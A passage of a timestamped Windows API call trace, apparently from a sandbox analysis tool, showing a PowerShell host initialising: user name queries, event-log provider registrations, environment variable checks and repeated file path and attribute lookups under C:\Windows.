	[0342.571] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d180 | out: lpFileInformation=0x14d180*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0342.571] SetErrorMode (uMode=0x1) returned 0x1
	[0342.571] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0342.571] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0342.571] CoTaskMemFree (pv=0x1b755000) 
	[0342.571] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.572] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0342.572] CoTaskMemFree (pv=0x245a70) 
	[0342.572] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd0ee0*="FileSystem", lpRawData=0x2dd0c70) returned 1
	[0342.572] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.573] CoTaskMemFree (pv=0x1f7900) 
	[0342.573] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0342.573] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0342.573] CoTaskMemFree (pv=0x1b755000) 
	[0342.573] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.573] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0342.574] CoTaskMemFree (pv=0x245a70) 
	[0342.574] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd6720*="Function", lpRawData=0x2dd64b0) returned 1
	[0342.574] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.575] CoTaskMemFree (pv=0x1f7900) 
	[0343.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.345] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0343.345] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0343.346] CoTaskMemFree (pv=0x1b755000) 
	[0343.346] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0343.346] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0343.346] CoTaskMemFree (pv=0x245a70) 
	[0343.347] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e08af8*="Registry", lpRawData=0x2e08888) returned 1
	[0343.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.604] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0343.604] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0343.604] CoTaskMemFree (pv=0x1b755000) 
	[0343.604] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0343.604] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0343.605] CoTaskMemFree (pv=0x245a70) 
	[0343.605] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e0df10*="Variable", lpRawData=0x2e0dca0) returned 1
	[0343.607] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0343.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.607] CoTaskMemFree (pv=0x1f7900) 
	[0343.610] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0343.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.611] CoTaskMemFree (pv=0x1f7900) 
	[0343.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0343.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0343.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0343.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0344.036] CoTaskMemAlloc (cb=0x804) returned 0x1b75ea70
	[0344.036] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75ea70, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0344.037] CoTaskMemFree (pv=0x1b75ea70) 
	[0344.037] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0344.037] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0344.037] CoTaskMemFree (pv=0x245a70) 
	[0344.038] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e21b28*="Certificate", lpRawData=0x2e218b8) returned 1
	[0344.225] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0344.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.225] CoTaskMemFree (pv=0x1f7900) 
	[0344.229] GetLogicalDrives () returned 0x4
	[0344.229] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0344.229] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0344.230] CoTaskMemAlloc (cb=0x20e) returned 0x28ec40
	[0344.230] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x28ec40 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0344.230] CoTaskMemFree (pv=0x28ec40) 
	[0344.231] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0344.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.232] CoTaskMemFree (pv=0x1f7900) 
	[0344.232] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0344.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.232] CoTaskMemFree (pv=0x1f7900) 
	[0344.243] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0344.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.243] CoTaskMemFree (pv=0x1f7900) 
	[0344.245] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0344.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.245] CoTaskMemFree (pv=0x1f7900) 
	[0344.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.245] SetErrorMode (uMode=0x1) returned 0x1
	[0344.245] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d1d0 | out: lpFileInformation=0x14d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.246] SetErrorMode (uMode=0x1) returned 0x1
	[0344.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.246] SetErrorMode (uMode=0x1) returned 0x1
	[0344.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d1d0 | out: lpFileInformation=0x14d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.246] SetErrorMode (uMode=0x1) returned 0x1
	[0344.246] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0344.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.247] CoTaskMemFree (pv=0x1f7900) 
	[0344.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.249] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0344.249] SetErrorMode (uMode=0x1) returned 0x1
	[0344.249] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0344.514] SetErrorMode (uMode=0x1) returned 0x1
	[0344.514] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0344.514] SetErrorMode (uMode=0x1) returned 0x1
	[0344.514] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0344.514] SetErrorMode (uMode=0x1) returned 0x1
	[0344.514] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0344.514] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0344.515] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.515] SetErrorMode (uMode=0x1) returned 0x1
	[0344.515] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0344.515] SetErrorMode (uMode=0x1) returned 0x1
	[0344.515] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.515] SetErrorMode (uMode=0x1) returned 0x1
	[0344.515] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0344.515] SetErrorMode (uMode=0x1) returned 0x1
	[0344.515] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.516] SetErrorMode (uMode=0x1) returned 0x1
	[0344.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.516] SetErrorMode (uMode=0x1) returned 0x1
	[0344.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.516] SetErrorMode (uMode=0x1) returned 0x1
	[0344.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.517] SetErrorMode (uMode=0x1) returned 0x1
	[0344.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.517] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.517] SetErrorMode (uMode=0x1) returned 0x1
	[0344.517] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d1d0 | out: lpFileInformation=0x14d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0344.518] SetErrorMode (uMode=0x1) returned 0x1
	[0344.518] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.518] SetErrorMode (uMode=0x1) returned 0x1
	[0344.518] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d1d0 | out: lpFileInformation=0x14d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0344.518] SetErrorMode (uMode=0x1) returned 0x1
	[0344.518] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0344.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.518] SetErrorMode (uMode=0x1) returned 0x1
	[0344.518] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d1d0 | out: lpFileInformation=0x14d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.519] SetErrorMode (uMode=0x1) returned 0x1
	[0344.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.519] SetErrorMode (uMode=0x1) returned 0x1
	[0344.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d1d0 | out: lpFileInformation=0x14d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.519] SetErrorMode (uMode=0x1) returned 0x1
	[0344.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0344.521] SetErrorMode (uMode=0x1) returned 0x1
	[0344.521] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d490 | out: lpFileInformation=0x14d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0344.521] SetErrorMode (uMode=0x1) returned 0x1
	[0344.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.841] CoTaskMemAlloc (cb=0x804) returned 0x1b75ea70
